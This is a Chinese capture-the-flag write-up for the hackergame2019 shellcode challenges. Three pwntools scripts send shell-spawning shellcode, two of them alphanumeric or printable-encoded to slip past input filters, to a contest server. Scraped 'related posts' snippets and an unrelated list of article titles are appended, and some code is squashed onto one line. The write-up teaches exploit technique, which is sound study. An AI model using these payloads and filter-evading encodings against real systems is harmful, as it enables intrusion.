题目(hackergame2019→shell骇客)

题目文件下载(提取码:emuy)

chall1


对文件分析完发现只需要生成一个不超过0x200长度的shellcode填充栈即可
如果不了解shellcraft可以参考https://www.jianshu.com/p/355e4badab50

exp

from pwn import *
context(arch = 'amd64', os = 'linux')
p = remote('202.38.93.241', 10000)
p.recvuntil(":")
shellcode = asm(shellcraft.sh())
p.send(shellcode)
p.interactive()

chall2


通过ASCII码表发现限制的条件是0-9和A-Z,想到利用pwnlibc.encoders生成的shellcode.然后利用alpha3.py对pwnlibc.encoders生成的shellcode进行转换,最终成功执行shellcode。

关于pwnlibc.encoders
关于alpha3.py使用的例子

exp

    from pwn import *context(arch = 'i386', os = 'linux')r = remote('202.38.93.241', 10002)r.recvuntil(":")r.send('PYVTX10X41PZ41H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2O0Z2G7O1E7M04KO1P0S2L0Y3T3CKL0J0N000Q5A1W66MN0Y0X021U9J622A0H1Y0K3A7O5I3A114CKO0J1Y4Z5F06')r.interactive()

chall3


与第二题类似,同样是限制条件ASCII内dec值为32到126

exp

    from pwn import *context(arch = 'amd64', os = 'linux')r = remote('202.38.93.241', 10004)r.recvuntil(":")r.send('Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t')r.interactive()

关于简单的shellcode的学习相关推荐

  1. Py:python利用easygui实现最简单GUI带你学习区块链技术的发展和由来

    Py:python利用easygui实现最简单GUI带你学习区块链技术的发展和由来 目录 输出结果 实现代码 输出结果 实现代码 # -*- coding: utf-8 -*- ''' Created ...

  2. 一个简单的例子,学习自定义注解和AOP

    转载自   一个简单的例子,学习自定义注解和AOP 记得今年年初刚开始面试的时候,被问的最多的就是你知道Spring的两大核心嘛?那你说说什么是AOP,什么是IOC?我相信你可能也被问了很多次了. 1 ...

  3. python的简单程序代码_小白学编程?从一个简单的程序开始学习Python编程

    笔者思虑再三还是决定选择图文(因为百家的视频发布画质真不怎么样[囧]). 笔者学习编程的时间也挺长的,因为业余,因为时间不多,各种原因,自学编程的路特别难走.然后笔者发现,自己能为小白贡献一些力量,然 ...

  4. 高级JAVA - 手写简单的重试组件学习Spring Retry

    目录 一 . 定义注解 二 . 利用cglib代理扩展重试业务 三 . 编写代理类 , 使用自定义的XRetryInterceptor作为拦截器 四 . 编写相关业务方法 , 测试代码 五 . 测试结 ...

  5. css js 简单的径向菜单学习笔记

    1.首先: <!DOCTYPE html> <html><head><meta charset="utf-8"><title& ...

  6. matlab exm,exm 《Experiments with MATLAB》这本书的程序源码,附中文注释,简单易懂,是学习 238万源代码下载- www.pudn.com...

    文件名称: exm下载 收藏√  [ 5  4  3  2  1 ] 开发工具: matlab 文件大小: 1154 KB 上传时间: 2014-11-21 下载次数: 6 提 供 者: 刘晏池 详细 ...

  7. 简单图形编程的学习(2)---点 (small basic实现)

    简单图形编程的学习(2)---点 (small basic实现) write by 九天雁翎(JTianLing) -- blog.csdn.net/vagrxie 讨论新闻组及文件 一. 又一顿牢骚 ...

  8. 表格合并行_Word制作验收单表格,很简单,快来学习吧

    作者:图文设计师东东 办公软件Word制作一款简单的验收单表格,方法很简单,大家一起来学习吧! 第一步.新建.插入表格 打开Word新建--空白文档,输入标题"验收单".如下图. ...

  9. 深度学习核心技术精讲100篇(二十四)-简单谈下深度学习在中文分词中的应用

    前言 随着深度学习的普及,有越来越多的研究应用新模型到中文分词上,让人直呼"手快有,手慢无".不过这些神经网络方法的真实水平如何?具体数值多少?以Sighan05中的PKU数据集为 ...

最新文章

  1. 求数列的和 AC 杭电
  2. Android系统Surface机制的SurfaceFlinger服务渲染应用程序UI的过程分析
  3. JQuery-学习笔记02【基础——JQuery选择器】
  4. 创新技术重塑未来物联网
  5. 【计算机科学基础】整数和小数的进制转换
  6. leetcode题解767-重构字符串
  7. 反编译 破解crash html editor winform [WinHTMLEditorControl.dll][.NET Win HTML Editor Control]
  8. Atitit 远程存储与协议 mtp ptp rndis midi nfs smb webdav ftp Atitit mtp ptp rndis midi协议的不同区别 1. PTP: 图
  9. 刷脸支付为人们消费方式创始一个新纪元
  10. 汉字五行归属python实现
  11. Win7盗版提示,屏幕右下角出现 Windows内部版本7601此Windows副本不是正版怎么办...
  12. webservice 缺少根元素_知识点:高中化学氮元素及其化合物知识总结
  13. 微信公众号 第三方登录 获取微信用户信息(java版)
  14. vue项目使用 Recorder.js 实现录音功能
  15. php import mdf,mdf文件用什么打开 mdf是什么文件
  16. 微信扫码支付demo java_微信扫码支付JavaDemo
  17. 时间戳转换年月日——记一次字节面试题(C++实现)
  18. 直播预告更新 | 火爆全网的ChatGPT为什么这么强?
  19. 网址二维码:如何制作网页链接二维码?
  20. CString 小结

热门文章

  1. CIE LAB色差公式与 CIE DE 2000色差公式计算类
  2. 武汉交通规划9号线九号线
  3. jetson nano GPIO控制说明
  4. 再见,itchat!再见,网页版微信!
  5. IDEA查看接口的实现类 快捷键
  6. api质量等级_让人懵逼了、API标准与ACEA标准有啥区别 ?
  7. 机器视觉有哪些定位算法?
  8. 用Scratch 巧解奥数题
  9. LAN8720A不能自动获取IP地址的问题
  10. 计算机图形学学习(一) 直线Bresenham算法讲解及matlab实现